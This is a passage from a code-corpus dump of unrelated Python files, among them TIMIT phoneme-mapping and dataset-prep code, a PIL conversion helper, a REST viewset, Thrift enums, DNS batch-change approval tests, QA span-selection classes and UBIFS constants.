transcript_file = Path(wav_file).with_suffix(".PHN")
if not Path(wav_file).is_file():
logging.warning(f"No such file: {wav_file}")
continue
if not Path(transcript_file).is_file():
logging.warning(f"No transcript: {transcript_file}")
continue
text = []
with open(transcript_file, "r") as f:
lines = f.readlines()
for line in lines:
phone = line.rstrip("\n").split(" ")[-1]
if num_phones != 60:
phone = phones_dict[str(phone)]
text.append(phone)
text = " ".join(text).replace("h#", "sil")
recording = Recording.from_file(path=wav_file, recording_id=idx)
recordings.append(recording)
segment = SupervisionSegment(
id=idx,
recording_id=idx,
start=0.0,
duration=recording.duration,
channel=0,
language="English",
speaker=speaker,
text=text.strip(),
)
supervisions.append(segment)
recording_set = RecordingSet.from_recordings(recordings)
supervision_set = SupervisionSet.from_segments(supervisions)
validate_recordings_and_supervisions(recording_set, supervision_set)
if output_dir is not None:
supervision_set.to_json(output_dir / f"supervisions_{part}.json")
recording_set.to_json(output_dir / f"recordings_{part}.json")
manifests[part] = {
"recordings": recording_set,
"supervisions": supervision_set,
}
return manifests
def get_phonemes(num_phones):
"""
Choose and convert the phones for modeling.
:param num_phones: the number of phones for modeling.
"""
phonemes = {}
if num_phones == int(48):
logging.debug("Using 48 phones for modeling!")
# This dictionary is used to convert the 60 phoneme set into the 48 one.
phonemes["sil"] = "sil"
phonemes["aa"] = "aa"
phonemes["ae"] = "ae"
phonemes["ah"] = "ah"
phonemes["ao"] = "ao"
phonemes["aw"] = "aw"
phonemes["ax"] = "ax"
phonemes["ax-h"] = "ax"
phonemes["axr"] = "er"
phonemes["ay"] = "ay"
phonemes["b"] = "b"
phonemes["bcl"] = "vcl"
phonemes["ch"] = "ch"
phonemes["d"] = "d"
phonemes["dcl"] = "vcl"
phonemes["dh"] = "dh"
phonemes["dx"] = "dx"
phonemes["eh"] = "eh"
phonemes["el"] = "el"
phonemes["em"] = "m"
phonemes["en"] = "en"
phonemes["eng"] = "ng"
phonemes["epi"] = "epi"
phonemes["er"] = "er"
phonemes["ey"] = "ey"
phonemes["f"] = "f"
phonemes["g"] = "g"
phonemes["gcl"] = "vcl"
phonemes["h#"] = "sil"
phonemes["hh"] = "hh"
phonemes["hv"] = "hh"
phonemes["ih"] = "ih"
phonemes["ix"] = "ix"
phonemes["iy"] = "iy"
phonemes["jh"] = "jh"
phonemes["k"] = "k"
phonemes["kcl"] = "cl"
phonemes["l"] = "l"
phonemes["m"] = "m"
phonemes["n"] = "n"
phonemes["ng"] = "ng"
phonemes["nx"] = "n"
phonemes["ow"] = "ow"
phonemes["oy"] = "oy"
phonemes["p"] = "p"
phonemes["pau"] = "sil"
phonemes["pcl"] = "cl"
phonemes["q"] = ""
phonemes["r"] = "r"
phonemes["s"] = "s"
phonemes["sh"] = "sh"
phonemes["t"] = "t"
phonemes["tcl"] = "cl"
phonemes["th"] = "th"
phonemes["uh"] = "uh"
phonemes["uw"] = "uw"
phonemes["ux"] = "uw"
phonemes["v"] = "v"
phonemes["w"] = "w"
phonemes["y"] = "y"
phonemes["z"] = "z"
phonemes["zh"] = "zh"
elif num_phones == int(39):
logging.debug("Using 39 phones for modeling!")
# This dictionary is used to convert the 60 phoneme set into the 39 one.
phonemes["sil"] = "sil"
phonemes["aa"] = "aa"
phonemes["ae"] = "ae"
phonemes["ah"] = "ah"
phonemes["ao"] = "aa"
phonemes["aw"] = "aw"
phonemes["ax"] = "ah"
phonemes["ax-h"] = "ah"
phonemes["axr"] = "er"
phonemes["ay"] = "ay"
phonemes["b"] = "b"
phonemes["bcl"] = "sil"
phonemes["ch"] = "ch"
phonemes["d"] = "d"
phonemes["dcl"] = "sil"
phonemes["dh"] = "dh"
phonemes["dx"] = "dx"
phonemes["eh"] = "eh"
phonemes["el"] = "l"
phonemes["em"] = "m"
phonemes["en"] = "n"
phonemes["eng"] = "ng"
phonemes["epi"] = "sil"
phonemes["er"] = "er"
phonemes["ey"] = "ey"
phonemes["f"] = "f"
phonemes["g"] = "g"
phonemes["gcl"] = "sil"
phonemes["h#"] = "sil"
phonemes["hh"] = "hh"
phonemes["hv"] = "hh"
phonemes["ih"] = "ih"
phonemes["ix"] = "ih"
phonemes["iy"] = "iy"
phonemes["jh"] = "jh"
phonemes["k"] = "k"
phonemes["kcl"] = "sil"
phonemes["l"] = "l"
phonemes["m"] = "m"
phonemes["ng"] = "ng"
phonemes["n"] = "n"
phonemes["nx"] = "n"
phonemes["ow"] = "ow"
phonemes["oy"] = "oy"
phonemes["p"] = "p"
phonemes["pau"] = "sil"
phonemes["pcl"] = "sil"
phonemes["q"] = ""
phonemes["r"] = "r"
phonemes["s"] = "s"
phonemes["sh"] = "sh"
phonemes["t"] = "t"
phonemes["tcl"] = "sil"
phonemes["th"] = "th"
phonemes["uh"] = "uh"
phonemes["uw"] = "uw"
phonemes["ux"] = "uw"
phonemes["v"] = "v"
phonemes["w"] = "w"
phonemes["y"] = "y"
phonemes["z"] = "z"
phonemes["zh"] = "sh"
else:
logging.debug("Using 60 phones for modeling!")
return phonemes
def get_speakers():
# List of test speakers
test_spk = [
"fdhc0",
"felc0",
"fjlm0",
"fmgd0",
"fmld0",
"fnlp0",
"fpas0",
"fpkt0",
"mbpm0",
"mcmj0",
"mdab0",
"mgrt0",
"mjdh0",
"mjln0",
"mjmp0",
"mklt0",
"mlll0",
"mlnt0",
"mnjm0",
"mpam0",
"mtas1",
"mtls0",
"mwbt0",
"mwew0",
]
# List of dev speakers
dev_spk = [
"fadg0",
"faks0",
"fcal1",
"fcmh0",
"fdac1",
"fdms0",
"fdrw0",
"fedw0",
"fgjd0",
"fjem0",
"fjmg0",
"fjsj0",
"fkms0",
"fmah0",
"fmml0",
"fnmr0",
"frew0",
"fsem0",
"majc0",
"mbdg0",
"mbns0",
"mbwm0",
"mcsh0",
"mdlf0",
"mdls0",
"mdvc0",
"mers0",
"mgjf0",
"mglb0",
"mgwt0",
"mjar0",
"mjfc0",
"mjsw0",
"mmdb1",
"mmdm2",
"mmjr0",
"mmwh0",
"mpdf0",
"mrcs0",
"mreb0",
"mrjm4",
"mrjr0",
"mroa0",
"mrtk0",
"mrws1",
"mtaa0",
"mtdt0",
"mteb0",
"mthc0",
"mwjg0",
]
return dev_spk, test_spk
|
python/kwiver/vital/util/VitalPIL.py
|
mwoehlke-kitware/kwiver
| 176 |
70383
|
"""
ckwg +31
Copyright 2017 by Kitware, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither name of Kitware, Inc. nor the names of any contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==============================================================================
Helper functions for dealing with PIL
"""
from kwiver.vital.types import Image
import six
def _pil_image_to_bytes(p_img):
"""
Get the component bytes from the given PIL Image.
In recent version of PIL, the tobytes function is the correct thing to
call, but some older versions of PIL do not have this function.
:param p_img: PIL Image to get the bytes from.
:type p_img: PIL.Image.Image
:returns: Byte string.
:rtype: bytes
"""
if hasattr(p_img, 'tobytes'):
return p_img.tobytes()
else:
# Older version of the function.
return p_img.tostring()
def _pil_image_from_bytes(mode, size, data, decoder_name='raw', *args):
"""
Creates a copy of an image memory from pixel data in a buffer.
In recent versionf of PIL, the frombytes function is the correct thing to
call, but older version fo PIL only have a fromstring, which is equivalent
in function.
:param mode: The image mode. See: :ref:`concept-modes`.
:param size: The image size.
:param data: A byte buffer containing raw data for the given mode.
:param decoder_name: What decoder to use.
:param args: Additional parameters for the given decoder.
:returns: An :py:class:`~PIL.Image.Image` object.
"""
import PIL.Image
if hasattr(PIL.Image, 'frombytes'):
return PIL.Image.frombytes(mode, size, data, decoder_name, *args)
else:
return PIL.Image.fromstring(mode, size, data, decoder_name, *args)
def from_pil(pil_image):
"""
Construct Image from supplied PIL image object.
:param pil_image: PIL image object
:type pil_image: PIL.Image.Image
:raises RuntimeError: If the PIL Image provided is not in a recognized
mode.
:returns: New Image instance using the given image's pixels.
:rtype: Image
"""
(img_width, img_height) = pil_image.size
mode = pil_image.mode
# TODO(paul.tunison): Extract this logic out into a utility function.
if mode == "1": # boolean
img_depth = 1
img_w_step = 1
img_h_step = img_width
img_d_step = 0
img_pix_num_bytes = 1
img_pix_type = Image.PIXEL_BOOL
elif mode == "L": # 8-bit greyscale
img_depth = 1
img_w_step = 1
img_h_step = img_width
img_d_step = 0
img_pix_num_bytes = 1
img_pix_type = Image.PIXEL_UNSIGNED
elif mode == "RGB": # 8-bit RGB
img_depth = 3
img_w_step = 3
img_h_step = img_width * 3
img_d_step = 1
img_pix_num_bytes = 1
img_pix_type = Image.PIXEL_UNSIGNED
elif mode == "RGBA": # 8-bit RGB with alpha
img_depth = 4
img_w_step = 4
img_h_step = img_width * 4
img_d_step = 1
img_pix_num_bytes = 1
img_pix_type = Image.PIXEL_UNSIGNED
elif mode == "I": # 32-bit signed int greyscale
img_depth = 1
img_w_step = 1
img_h_step = img_width
img_d_step = 0
img_pix_num_bytes = 4
img_pix_type = Image.PIXEL_SIGNED
elif mode == "F": # 32-bit float greyscale
img_depth = 1
img_w_step = 1
img_h_step = img_width
img_d_step = 0
img_pix_num_bytes = 4
img_pix_type = Image.PIXEL_FLOAT
else:
raise RuntimeError("Unsupported image format.")
img_data = _pil_image_to_bytes(pil_image)
vital_img = Image(img_data,
img_width, img_height, img_depth,
img_w_step, img_h_step, img_d_step,
img_pix_type, img_pix_num_bytes)
return vital_img
def get_pil_image(img):
""" Get image in python friendly format
Assumptions are that the image has byte pixels.
:return: array containing image
:rtype: pil image
"""
def pil_mode_from_image(img):
"""
Determine image format from pixel properties
May return None if our current encoding does not map to a PIL image
mode.
"""
if img.pixel_type() == img.PIXEL_UNSIGNED and img.pixel_num_bytes() == 1:
if img.depth() == 3 and img.d_step() == 1 and img.w_step() == 3:
return "RGB"
elif img.depth() == 4 and img.d_step() == 1 and img.w_step() == 4:
return "RGBA"
elif img.depth() == 1 and img.w_step() == 1:
return "L"
elif img.depth() == 1 and img.w_step() == 1:
if img.pixel_type() == img.PIXEL_BOOL and img.pixel_num_bytes() == 1:
return "1"
elif img.pixel_type() == img.PIXEL_SIGNED and img.pixel_num_bytes() == 4:
return "I"
elif img.pixel_type() == img.PIXEL_FLOAT and img.pixel_num_bytes() == 4:
return "F"
return None
mode = pil_mode_from_image(img)
if not mode:
# make a copy of this image using contiguous memory with interleaved channels
new_img = Image(img.width(), img.height(), img.depth(),
True, img.pixel_type(), img.pixel_num_bytes())
new_img.copy_from(img)
img = new_img
mode = pil_mode_from_image(img)
if not mode:
raise RuntimeError("Unsupported image format.")
# get buffer from image
if six.PY2:
img_pixels = buffer(bytearray(img))
else:
img_pixels = memoryview(bytearray(img)).tobytes()
pil_img = _pil_image_from_bytes(mode, (img.width(), img.height()),
img_pixels, "raw", mode,
img.h_step() * img.pixel_num_bytes(), 1)
return pil_img
|
pydis_site/apps/api/viewsets/bot/offensive_message.py
|
Transfusion/site
| 700 |
70450
|
from rest_framework.mixins import (
CreateModelMixin,
DestroyModelMixin,
ListModelMixin
)
from rest_framework.viewsets import GenericViewSet
from pydis_site.apps.api.models.bot.offensive_message import OffensiveMessage
from pydis_site.apps.api.serializers import OffensiveMessageSerializer
class OffensiveMessageViewSet(
CreateModelMixin, ListModelMixin, DestroyModelMixin, GenericViewSet
):
"""
View providing CRUD access to offensive messages.
## Routes
### GET /bot/offensive-messages
Returns all offensive messages in the database.
#### Response format
>>> [
... {
... 'id': '631953598091100200',
... 'channel_id': '291284109232308226',
... 'delete_date': '2019-11-01T21:51:15.545000Z'
... },
... ...
... ]
#### Status codes
- 200: returned on success
### POST /bot/offensive-messages
Create a new offensive message object.
#### Request body
>>> {
... 'id': int,
... 'channel_id': int,
... 'delete_date': datetime.datetime # ISO-8601-formatted date
... }
#### Status codes
- 201: returned on success
- 400: if the body format is invalid
### DELETE /bot/offensive-messages/<id:int>
Delete the offensive message object with the given `id`.
#### Status codes
- 204: returned on success
- 404: if a offensive message object with the given `id` does not exist
## Authentication
Requires an API token.
"""
serializer_class = OffensiveMessageSerializer
queryset = OffensiveMessage.objects.all()
|
impala/_thrift_gen/Metrics/ttypes.py
|
wzhou-code/impyla
| 661 |
70461
|
#
# Autogenerated by Thrift Compiler (0.11.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:new_style,no_utf8strings
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
from thrift.transport import TTransport
all_structs = []
class TUnit(object):
UNIT = 0
UNIT_PER_SECOND = 1
CPU_TICKS = 2
BYTES = 3
BYTES_PER_SECOND = 4
TIME_NS = 5
DOUBLE_VALUE = 6
NONE = 7
TIME_MS = 8
TIME_S = 9
TIME_US = 10
BASIS_POINTS = 11
_VALUES_TO_NAMES = {
0: "UNIT",
1: "UNIT_PER_SECOND",
2: "CPU_TICKS",
3: "BYTES",
4: "BYTES_PER_SECOND",
5: "TIME_NS",
6: "DOUBLE_VALUE",
7: "NONE",
8: "TIME_MS",
9: "TIME_S",
10: "TIME_US",
11: "BASIS_POINTS",
}
_NAMES_TO_VALUES = {
"UNIT": 0,
"UNIT_PER_SECOND": 1,
"CPU_TICKS": 2,
"BYTES": 3,
"BYTES_PER_SECOND": 4,
"TIME_NS": 5,
"DOUBLE_VALUE": 6,
"NONE": 7,
"TIME_MS": 8,
"TIME_S": 9,
"TIME_US": 10,
"BASIS_POINTS": 11,
}
class TMetricKind(object):
GAUGE = 0
COUNTER = 1
PROPERTY = 2
STATS = 3
SET = 4
HISTOGRAM = 5
_VALUES_TO_NAMES = {
0: "GAUGE",
1: "COUNTER",
2: "PROPERTY",
3: "STATS",
4: "SET",
5: "HISTOGRAM",
}
_NAMES_TO_VALUES = {
"GAUGE": 0,
"COUNTER": 1,
"PROPERTY": 2,
"STATS": 3,
"SET": 4,
"HISTOGRAM": 5,
}
fix_spec(all_structs)
del all_structs
|
modules/api/functional_test/live_tests/batch/approve_batch_change_test.py
|
slandry90/vinyldns
| 333 |
70462
|
from hamcrest import *
from utils import *
@pytest.mark.serial
@pytest.mark.manual_batch_review
def test_approve_pending_batch_change_success(shared_zone_test_context):
"""
Test approving a batch change succeeds for a support user
"""
client = shared_zone_test_context.ok_vinyldns_client
approver = shared_zone_test_context.support_user_client
batch_change_input = {
"changes": [
get_change_A_AAAA_json("test-approve-success.not.loaded.", address="4.3.2.1"),
get_change_A_AAAA_json("needs-review.not.loaded.", address="4.3.2.1"),
get_change_A_AAAA_json("zone-name-flagged-for-manual-review.zone.requires.review.")
],
"ownerGroupId": shared_zone_test_context.ok_group['id']
}
to_delete = []
to_disconnect = None
try:
result = client.create_batch_change(batch_change_input, status=202)
get_batch = client.get_batch_change(result['id'])
assert_that(get_batch['status'], is_('PendingReview'))
assert_that(get_batch['approvalStatus'], is_('PendingReview'))
assert_that(get_batch['changes'][0]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][0]['validationErrors'][0]['errorType'], is_('ZoneDiscoveryError'))
assert_that(get_batch['changes'][1]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][1]['validationErrors'][0]['errorType'], is_('RecordRequiresManualReview'))
assert_that(get_batch['changes'][2]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][2]['validationErrors'][0]['errorType'], is_('RecordRequiresManualReview'))
# need to create the zone so the change can succeed
zone = {
'name': 'not.loaded.',
'email': '<EMAIL>',
'adminGroupId': shared_zone_test_context.ok_group['id'],
'backendId': 'func-test-backend',
'shared': True
}
zone_create = approver.create_zone(zone, status=202)
to_disconnect = zone_create['zone']
approver.wait_until_zone_active(to_disconnect['id'])
approved = approver.approve_batch_change(result['id'], status=202)
completed_batch = client.wait_until_batch_change_completed(approved)
to_delete = [(change['zoneId'], change['recordSetId']) for change in completed_batch['changes']]
assert_that(completed_batch['status'], is_('Complete'))
for change in completed_batch['changes']:
assert_that(change['status'], is_('Complete'))
assert_that(len(change['validationErrors']), is_(0))
assert_that(completed_batch['approvalStatus'], is_('ManuallyApproved'))
assert_that(completed_batch['reviewerId'], is_('support-user-id'))
assert_that(completed_batch['reviewerUserName'], is_('support-user'))
assert_that(completed_batch, has_key('reviewTimestamp'))
assert_that(get_batch, not(has_key('cancelledTimestamp')))
finally:
clear_zoneid_rsid_tuple_list(to_delete, client)
if to_disconnect:
approver.abandon_zones(to_disconnect['id'], status=202)
@pytest.mark.manual_batch_review
def test_approve_pending_batch_change_fails_if_there_are_still_errors(shared_zone_test_context):
"""
Test approving a batch change fails if there are still errors
"""
client = shared_zone_test_context.ok_vinyldns_client
approver = shared_zone_test_context.support_user_client
batch_change_input = {
"changes": [
get_change_A_AAAA_json("needs-review.nonexistent.", address="4.3.2.1"),
get_change_A_AAAA_json("zone.does.not.exist.")
],
"ownerGroupId": shared_zone_test_context.ok_group['id']
}
complete_rs = None
try:
result = client.create_batch_change(batch_change_input, status=202)
get_batch = client.get_batch_change(result['id'])
assert_that(get_batch['status'], is_('PendingReview'))
assert_that(get_batch['approvalStatus'], is_('PendingReview'))
assert_that(get_batch['changes'][0]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][0]['validationErrors'][0]['errorType'], is_('RecordRequiresManualReview'))
assert_that(get_batch['changes'][1]['status'], is_('NeedsReview'))
assert_that(get_batch['changes'][1]['validationErrors'][0]['errorType'], is_('ZoneDiscoveryError'))
approval_response = approver.approve_batch_change(result['id'], status=400)
assert_that((approval_response[0]['errors'][0]), contains_string('Zone Discovery Failed'))
assert_that((approval_response[1]['errors'][0]), contains_string('Zone Discovery Failed'))
updated_batch = client.get_batch_change(result['id'], status=200)
assert_that(updated_batch['status'], is_('PendingReview'))
assert_that(updated_batch['approvalStatus'], is_('PendingReview'))
assert_that(updated_batch, not(has_key('reviewerId')))
assert_that(updated_batch, not(has_key('reviewerUserName')))
assert_that(updated_batch, not(has_key('reviewTimestamp')))
assert_that(updated_batch, not(has_key('cancelledTimestamp')))
assert_that(updated_batch['changes'][0]['status'], is_('NeedsReview'))
assert_that(updated_batch['changes'][0]['validationErrors'][0]['errorType'], is_('ZoneDiscoveryError'))
assert_that(updated_batch['changes'][1]['status'], is_('NeedsReview'))
assert_that(updated_batch['changes'][1]['validationErrors'][0]['errorType'], is_('ZoneDiscoveryError'))
finally:
if complete_rs:
delete_result = client.delete_recordset(complete_rs['zoneId'], complete_rs['id'], status=202)
client.wait_until_recordset_change_status(delete_result, 'Complete')
@pytest.mark.manual_batch_review
def test_approve_batch_change_with_invalid_batch_change_id_fails(shared_zone_test_context):
"""
Test approving a batch change with invalid batch change ID
"""
client = shared_zone_test_context.ok_vinyldns_client
error = client.approve_batch_change("some-id", status=404)
assert_that(error, is_("Batch change with id some-id cannot be found"))
@pytest.mark.manual_batch_review
def test_approve_batch_change_with_comments_exceeding_max_length_fails(shared_zone_test_context):
"""
Test approving a batch change with comments exceeding 1024 characters fails
"""
client = shared_zone_test_context.ok_vinyldns_client
approve_batch_change_input = {
"reviewComment": "a"*1025
}
errors = client.approve_batch_change("some-id", approve_batch_change_input, status=400)['errors']
assert_that(errors, contains_inanyorder("Comment length must not exceed 1024 characters."))
@pytest.mark.manual_batch_review
def test_approve_batch_change_fails_with_forbidden_error_for_non_system_admins(shared_zone_test_context):
"""
Test approving a batch change if the reviewer is not a super user or support user
"""
client = shared_zone_test_context.ok_vinyldns_client
batch_change_input = {
"changes": [
get_change_A_AAAA_json("no-owner-group-id.ok.", address="4.3.2.1")
]
}
to_delete = []
try:
result = client.create_batch_change(batch_change_input, status=202)
completed_batch = client.wait_until_batch_change_completed(result)
to_delete = [(change['zoneId'], change['recordSetId']) for change in completed_batch['changes']]
error = client.approve_batch_change(completed_batch['id'], status=403)
assert_that(error, is_("User does not have access to item " + completed_batch['id']))
finally:
clear_zoneid_rsid_tuple_list(to_delete, client)
|
pygaggle/qa/span_selection.py
|
Elfsong/pygaggle
| 166 |
70473
|
<gh_stars>100-1000
import numpy as np
from collections import defaultdict
from .base import Answer
from .utils import normalize_answer
class SpanSelection:
def reset(self):
pass
def score(self, span, text):
pass
def add_answers(self, spans_by_text, texts):
pass
def top_answers(self, num_spans):
pass
def __str__(self):
pass
class DprSelection(SpanSelection):
def reset(self):
self.answers = []
def score(self, span, text):
return float(span.relevance_score), float(span.span_score)
def add_answers(self, spans_by_text, texts):
for spans, text in zip(spans_by_text, texts):
for span in spans:
self.answers.append(Answer(text=span.text,
context=text,
score=self.score(span, text)))
def top_answers(self, num_spans):
return sorted(self.answers, reverse=True, key=lambda answer: answer.score)[: num_spans]
def __str__(self):
return 'DPR'
class DprFusionSelection(DprSelection):
def __init__(self, beta, gamma):
self.beta = float(beta)
self.gamma = float(gamma)
def score(self, span, text):
return float(span.relevance_score) * self.beta + float(text.score) * self.gamma, float(span.span_score)
def __str__(self):
return f'DPR Fusion, beta={self.beta}, gamma={self.gamma}'
class GarSelection(SpanSelection):
def reset(self):
self.answers = defaultdict(int)
def score(self, span, text):
return float(span.relevance_score)
def add_answers(self, spans_by_text, texts):
eD = np.exp(np.array([self.score(spans[0], text) for spans, text in zip(spans_by_text, texts)]))
for i, spans in enumerate(spans_by_text):
topn_spans = spans[:5]
eSi = np.exp(np.array([float(span.span_score) for span in topn_spans]))
softmaxSi = list(eSi / np.sum(eSi))
for j, span in enumerate(topn_spans):
self.answers[normalize_answer(span.text)] += eD[i] * softmaxSi[j]
def top_answers(self, num_spans):
answers = sorted(list(self.answers.items()), reverse=True, key=lambda answer: answer[1])[: num_spans]
return list(map(lambda answer: Answer(text=answer[0], score=answer[1]), answers))
def __str__(self):
return 'GAR'
class GarFusionSelection(GarSelection):
def __init__(self, beta, gamma):
self.beta = float(beta)
self.gamma = float(gamma)
def score(self, span, text):
return float(span.relevance_score) * self.beta + float(text.score) * self.gamma
def __str__(self):
return f'GAR Fusion, beta={self.beta}, gamma={self.gamma}'
|
environments/mujoco/rand_param_envs/mujoco_py/__init__.py
|
lfeng1999/varibad
| 119 |
70492
|
<reponame>lfeng1999/varibad<filename>environments/mujoco/rand_param_envs/mujoco_py/__init__.py
from .config import init_config, get_key_path
init_config()
from .mjviewer import MjViewer
from .mjcore import MjModel
from .mjcore import register_license
from .mjconstants import *
from .platname_targdir import targdir
register_license(get_key_path())
|
share/tools/ubi_reader/ubifs/defines.py
|
zengzhen1994k/leonsioy
| 143 |
70508
|
<reponame>zengzhen1994k/leonsioy<filename>share/tools/ubi_reader/ubifs/defines.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#############################################################
# Adapted in part from linux-source-3.2/fs/ubi/ubi-media.h
# for use in Python.
# Oct. 2013 by <NAME>
#
# Original copyright notice.
# --------------------------
#
# This file is part of UBIFS.
#
# Copyright (C) 2006-2008 Nokia Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors: <NAME> (<NAME>)
# <NAME>
#
#############################################################
import struct
# Constant defines
# Common Header.
UBIFS_NODE_MAGIC = '\x31\x18\x10\x06' # Set to LSB
# Initial CRC32 value.
UBIFS_CRC32_INIT = 0xFFFFFFFF
# Do not compress data smaller than this.
UBIFS_MIN_COMPR_LEN = 128
# If difference between compressed data length and compressed data
# length, is less than this, do not compress data.
UBIFS_MIN_COMPRESS_DIFF = 64
# Root inode number
UBIFS_ROOT_INO = 1
# Lowest inode number for regular inodes, non-internal inodes.
UBIFS_FIRST_INO = 64
# Max file name and extended attr length (muptple of 8 minus 1.
UBIFS_MAX_NLEN = 255
# Max number of data journal heads.
UBIFS_MAX_JHEADS = 1
# Max data node data length/amount attached to inode node.
UBIFS_BLOCK_SIZE = 4096
UBIFS_BLOCK_SHIFT = 12
# UBIFS padding byte pattern.
UBIFS_PADDING_BYTE = '\xCE'
# Max key length
UBIFS_MAX_KEY_LEN = 16
# Key length of simple format.
UBIFS_SK_LEN = 8
# Min index tree fanout.
UBIFS_MIN_FANOUT = 3
# Max number of levels in UBIFS indexing B-tree.
UBIFS_MAX_LEVELS = 512
# Max amount of data attached to inode in bytes.
UBIFS_MAX_INO_DATA = UBIFS_BLOCK_SIZE
# LEB Properties Tree fanout (power of 2) and fanout.
UBIFS_LPT_FANOUT = 4
UBIFS_LPT_FANOUT_SHIFT = 2
# LEB Properties Tree bit field sizes.
UBIFS_LPT_CRC_BITS = 16
UBIFS_LPT_CRC_BYTES = 2
UBIFS_LPT_TYPE_BITS = 4
# LEB Properties Tree node types.
UBIFS_LPT_PNODE = 0 # LPT leaf node (contains LEB Properties)
UBIFS_LPT_NNODE = 1 # LPT internal node
UBIFS_LPT_LTAB = 2 # LPT's own lprops table
UBIFS_LPT_LSAVE = 3 # LPT's save table (big model only)
UBIFS_LPT_NODE_CNT = 4 # count of LPT node types
UBIFS_LPT_NOT_A_NODE = (1 << UBIFS_LPT_TYPE_BITS) - 1 # 4 bits of 1
# Inode types
UBIFS_ITYPE_REG = 0 # Regular file
UBIFS_ITYPE_DIR = 1 # Directory
UBIFS_ITYPE_LNK = 2 # Soft link
UBIFS_ITYPE_BLK = 3 # Block device node
UBIFS_ITYPE_CHR = 4 # Char device node
UBIFS_ITYPE_FIFO = 5 # FIFO
UBIFS_ITYPE_SOCK = 6 # Socket
UBIFS_ITYPES_CNT = 7 # Support file type count
# Supported key has functions
UBIFS_KEY_HASH_R5 = 0 # R5 hash
UBIFS_KEY_HASH_TEST = 1 # Test hash, returns first 4 bytes of name
PRINT_UBIFS_KEY_HASH = ['r5', 'test']
# Supported key formats
UBIFS_SIMPLE_KEY_FMT = 0
# Simple key format uses 29 bits for storing UBIFS name and hash.
UBIFS_S_KEY_BLOCK_BITS = 29
UBIFS_S_KEY_BLOCK_MASK = 0x1FFFFFFF
UBIFS_S_KEY_HASH_BITS = UBIFS_S_KEY_BLOCK_BITS
UBIFS_S_KEY_HASH_MASK = UBIFS_S_KEY_BLOCK_MASK
# Key types
UBIFS_INO_KEY = 0 # Inode node key
UBIFS_DATA_KEY = 1 # Data node key
UBIFS_DENT_KEY = 2 # Directory node key
UBIFS_XENT_KEY = 3 # Extended attribute entry key
UBIFS_KEY_TYPES_CNT = 4 # Supported key count
# Number of reserved LEBs for Superblock area
UBIFS_SB_LEBS = 1
# Number of reserved LEBs for master area
UBIFS_MST_LEBS = 2
# First LEB of the Superblock area
UBIFS_SB_LNUM = 0
# First LEB of the master area
UBIFS_MST_LNUM = (UBIFS_SB_LNUM + UBIFS_SB_LEBS)
# First LEB of log area
UBIFS_LOG_LNUM = (UBIFS_MST_LNUM + UBIFS_MST_LEBS)
# On-flash inode flags
UBIFS_COMPR_FL = 1 # Use compression for this inode
UBIFS_SYNC_FL = 2 # Has to be synchronous I/O
UBIFS_IMMUTABLE_FL = 4 # Inode is immutable
UBIFS_APPEND_FL = 8 # Writes may only append data
UBIFS_DIRSYNC_FL = 16 # I/O on this directory inode must be synchronous
UBIFS_XATTR_FL = 32 # This inode is inode for extended attributes
# Inode flag bits used by UBIFS
UBIFS_FL_MASK = 0x0000001F
# Compression alogrithms.
UBIFS_COMPR_NONE = 0 # No compression
UBIFS_COMPR_LZO = 1 # LZO compression
UBIFS_COMPR_ZLIB = 2 # ZLIB compression
UBIFS_COMPR_TYPES_CNT = 3 # Count of supported compression types
PRINT_UBIFS_COMPR = ['none','lzo','zlib']
# UBIFS node types
UBIFS_INO_NODE = 0 # Inode node
UBIFS_DATA_NODE = 1 # Data node
UBIFS_DENT_NODE = 2 # Directory entry node
UBIFS_XENT_NODE = 3 # Extended attribute node
UBIFS_TRUN_NODE = 4 # Truncation node
UBIFS_PAD_NODE = 5 # Padding node
UBIFS_SB_NODE = 6 # Superblock node
UBIFS_MST_NODE = 7 # Master node
UBIFS_REF_NODE = 8 # LEB reference node
UBIFS_IDX_NODE = 9 # Index node
UBIFS_CS_NODE = 10 # Commit start node
UBIFS_ORPH_NODE = 11 # Orphan node
UBIFS_NODE_TYPES_CNT = 12 # Count of supported node types
# Master node flags
UBIFS_MST_DIRTY = 1 # Rebooted uncleanly
UBIFS_MST_NO_ORPHS = 2 # No orphans present
UBIFS_MST_RCVRY = 4 # Written by recovery
# Node group type
